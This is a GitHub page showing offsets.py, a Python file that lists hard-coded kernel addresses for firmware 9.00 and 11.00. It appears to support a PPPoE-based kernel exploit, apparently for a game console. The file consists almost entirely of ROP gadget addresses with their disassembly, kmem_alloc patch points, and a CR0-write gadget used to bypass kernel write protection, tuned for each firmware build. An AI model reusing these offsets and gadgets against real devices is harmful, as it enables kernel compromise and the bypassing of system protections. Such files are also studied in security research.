-
Notifications
You must be signed in to change notification settings - Fork 0
/
offsets.py
192 lines (126 loc) · 5.63 KB
/
offsets.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
# Copyright (C) 2024 Andy Nguyen
#
# This software may be modified and distributed under the terms
# of the MIT license. See the LICENSE file for details.
# FW 9.00
class OffsetsFirmware_900:
PPPOE_SOFTC_LIST = 0xffffffff843ed9f8
KERNEL_MAP = 0xffffffff84468d48
SETIDT = 0xffffffff82512c40
KMEM_ALLOC = 0xffffffff8257be70
KMEM_ALLOC_PATCH1 = 0xffffffff8257bf3c
KMEM_ALLOC_PATCH2 = 0xffffffff8257bf44
MEMCPY = 0xffffffff824714b0
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff823fb949
SECOND_GADGET_OFF = 0x3d
# 0xffffffff82996603 : jmp qword ptr [rsi + 0x3d]
FIRST_GADGET = 0xffffffff82996603
# 0xffffffff82c76646 : push rbp ; jmp qword ptr [rsi]
PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c76646
# 0xffffffff822b4151 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10]
POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff822b4151
# 0xffffffff82941e46 : lea rsp, [rsi + 0x20] ; repz ret
LEA_RSP_RSI_20_REPZ_RET = 0xffffffff82941e46
# 0xffffffff826c52aa : add rsp, 0x28 ; pop rbp ; ret
ADD_RSP_28_POP_RBP_RET = 0xffffffff826c52aa
# 0xffffffff8251b08f : add rsp, 0xb0 ; pop rbp ; ret
ADD_RSP_B0_POP_RBP_RET = 0xffffffff8251b08f
# 0xffffffff822008e0 : ret
RET = 0xffffffff822008e0
# 0xffffffff822391a8 : pop rdi ; ret
POP_RDI_RET = 0xffffffff822391a8
# 0xffffffff822aad39 : pop rsi ; ret
POP_RSI_RET = 0xffffffff822aad39
# 0xffffffff82322eba : pop rdx ; ret
POP_RDX_RET = 0xffffffff82322eba
# 0xffffffff822445e7 : pop rcx ; ret
POP_RCX_RET = 0xffffffff822445e7
# 0xffffffff822ab4dd : pop r8 ; pop rbp ; ret
POP_R8_POP_RBP_RET = 0xffffffff822ab4dd
# 0xffffffff8279fa0f : pop r12 ; ret
POP_R12_RET = 0xffffffff8279fa0f
# 0xffffffff82234ec8 : pop rax ; ret
POP_RAX_RET = 0xffffffff82234ec8
# 0xffffffff822008df : pop rbp ; ret
POP_RBP_RET = 0xffffffff822008df
# 0xffffffff82bb687a : push rsp ; pop rsi ; ret
PUSH_RSP_POP_RSI_RET = 0xffffffff82bb687a
# 0xffffffff82244ed0 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax
MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff82244ed0
# 0xffffffff82b7450e : mov byte ptr [rcx], al ; ret
MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff82b7450e
# 0xffffffff82632b9c : mov rdi, rbx ; call r12
MOV_RDI_RBX_CALL_R12 = 0xffffffff82632b9c
# 0xffffffff8235b387 : mov rdi, r14 ; call r12
MOV_RDI_R14_CALL_R12 = 0xffffffff8235b387
# 0xffffffff822e3d7e : mov rsi, rbx ; call rax
MOV_RSI_RBX_CALL_RAX = 0xffffffff822e3d7e
# 0xffffffff82363918 : mov r14, rax ; call r8
MOV_R14_RAX_CALL_R8 = 0xffffffff82363918
# 0xffffffff82cb683a : add rdi, rcx ; ret
ADD_RDI_RCX_RET = 0xffffffff82cb683a
# 0xffffffff82409557 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret
SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff82409557
# 0xffffffff82b85693 : jmp r14
JMP_R14 = 0xffffffff82b85693
# FW 11.00
class OffsetsFirmware_1100:
PPPOE_SOFTC_LIST = 0xffffffff844e2578
KERNEL_MAP = 0xffffffff843ff130
SETIDT = 0xffffffff8245bdb0
KMEM_ALLOC = 0xffffffff82445e10
KMEM_ALLOC_PATCH1 = 0xffffffff82445edc
KMEM_ALLOC_PATCH2 = 0xffffffff82445ee4
MEMCPY = 0xffffffff824dddf0
MOV_CR0_RSI_UD2_MOV_EAX_1_RET = 0xffffffff824f1299
SECOND_GADGET_OFF = 0x3e
# 0xffffffff82eb1f97 : jmp qword ptr [rsi + 0x3e]
FIRST_GADGET = 0xffffffff82eb1f97
# 0xffffffff82c75166 : push rbp ; jmp qword ptr [rsi]
PUSH_RBP_JMP_QWORD_PTR_RSI = 0xffffffff82c75166
# 0xffffffff824b90e1 : pop rbx ; pop r14 ; pop rbp ; jmp qword ptr [rsi + 0x10]
POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10 = 0xffffffff824b90e1
# 0xffffffff8293c8c6 : lea rsp, [rsi + 0x20] ; repz ret
LEA_RSP_RSI_20_REPZ_RET = 0xffffffff8293c8c6
# 0xffffffff826cb2da : add rsp, 0x28 ; pop rbp ; ret
ADD_RSP_28_POP_RBP_RET = 0xffffffff826cb2da
# 0xffffffff824cdd5f : add rsp, 0xb0 ; pop rbp ; ret
ADD_RSP_B0_POP_RBP_RET = 0xffffffff824cdd5f
# 0xffffffff822007e4 : ret
RET = 0xffffffff822007e4
# 0xffffffff825f38ed : pop rdi ; ret
POP_RDI_RET = 0xffffffff825f38ed
# 0xffffffff8224a6a9 : pop rsi ; ret
POP_RSI_RET = 0xffffffff8224a6a9
# 0xffffffff822a4762 : pop rdx ; ret
POP_RDX_RET = 0xffffffff822a4762
# 0xffffffff8221170a : pop rcx ; ret
POP_RCX_RET = 0xffffffff8221170a
# 0xffffffff8224ae4d : pop r8 ; pop rbp ; ret
POP_R8_POP_RBP_RET = 0xffffffff8224ae4d
# 0xffffffff8279faaf : pop r12 ; ret
POP_R12_RET = 0xffffffff8279faaf
# 0xffffffff8221172e : pop rax ; ret
POP_RAX_RET = 0xffffffff8221172e
# 0xffffffff822008df : pop rbp ; ret
POP_RBP_RET = 0xffffffff822008df
# 0xffffffff82bb5c7a : push rsp ; pop rsi ; ret
PUSH_RSP_POP_RSI_RET = 0xffffffff82bb5c7a
# 0xffffffff823ce260 : mov rdi, qword ptr [rdi] ; pop rbp ; jmp rax
MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX = 0xffffffff823ce260
# 0xffffffff8236ae58 : mov byte ptr [rcx], al ; ret
MOV_BYTE_PTR_RCX_AL_RET = 0xffffffff8236ae58
# 0xffffffff8233426c : mov rdi, rbx ; call r12
MOV_RDI_RBX_CALL_R12 = 0xffffffff8233426c
# 0xffffffff823340a7 : mov rdi, r14 ; call r12
MOV_RDI_R14_CALL_R12 = 0xffffffff823340a7
# 0xffffffff82512dce : mov rsi, rbx ; call rax
MOV_RSI_RBX_CALL_RAX = 0xffffffff82512dce
# 0xffffffff82624df8 : mov r14, rax ; call r8
MOV_R14_RAX_CALL_R8 = 0xffffffff82624df8
# 0xffffffff82cb535a : add rdi, rcx ; ret
ADD_RDI_RCX_RET = 0xffffffff82cb535a
# 0xffffffff8260f297 : sub rsi, rdx ; mov rax, rsi ; pop rbp ; ret
SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET = 0xffffffff8260f297
# 0xffffffff82b84657 : jmp r14
JMP_R14 = 0xffffffff82b84657